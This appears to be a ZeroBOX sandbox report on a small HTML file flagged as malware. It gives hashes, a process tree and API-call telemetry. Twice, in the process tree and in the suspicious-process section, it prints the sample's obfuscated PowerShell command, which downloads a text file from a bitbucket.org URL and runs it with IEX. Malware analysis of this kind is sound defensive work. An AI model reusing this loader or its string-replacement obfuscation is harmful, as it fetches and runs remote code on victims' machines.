Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 16, 2021, 11:29 a.m.	Aug. 16, 2021, 11:31 a.m.

Size	2.3KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`4c5ef42b7b79c802e416448ded85c52b`
SHA256	`62489448c1e751f07686fa4e8606811c123e4a06661fa37712d7b55a7f5ab347`
CRC32	`AB6032CE`
ssdeep	`48:np19/RFkoYuAvUgvuVyVuD1gIG6TXcgdinQJFPbW:vXFquUUnV9D1ggYtQPi`
Yara	Generic_Malware_Zero - Generic Malware

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\LabelTEXT.txt.html
2484
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2484 CREDAT:145409
  2596
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://bitbucket.org/thereopportunity/en-en/downloads/Shtate.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
    292

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 16, 2021, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 16, 2021, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 16, 2021, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 16, 2021, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 16, 2021, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 16, 2021, 11:23 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 16, 2021, 11:23 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000037e1b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000392e20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000392e20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000392e20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b598ea0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b598ea0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599060 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599060 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599060 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599060 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599290 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599290 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599290 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b598f10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b598f10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b598f10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5995a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5995a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5995a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5995a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5995a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5995a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5995a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5995a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599760 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599760 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599760 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599140 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599140 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599840 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599840 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599140 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599140 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599140 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599a00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599a00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599a70 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b599a70 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5bcfe0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5bcfe0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5bd3d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5bd3d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5bd3d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5bd3d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5995a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 16, 2021, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5995a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 16, 2021, 11:22 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 287 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 region_size: 3346432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000024c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000027f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007727d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077284000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc2a5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc2a5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feff2d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feff101000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007726a000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2484 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000028b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000027f0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007727d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077284000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc2a5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feff2d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feff101000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007726a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:23 a.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2596 region_size: 13963264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000023e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2596 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003130000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2596 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2596 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2596 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2596 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2596 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2596 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2596 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007727d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2596 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 16, 2021, 11:22 a.m.	process_identifier: 2596 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077284000 process_handle: 0xffffffffffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

POWErSHELL $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://bitbucket.org/thereopportunity/en-en/downloads/Shtate.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');

cmdline

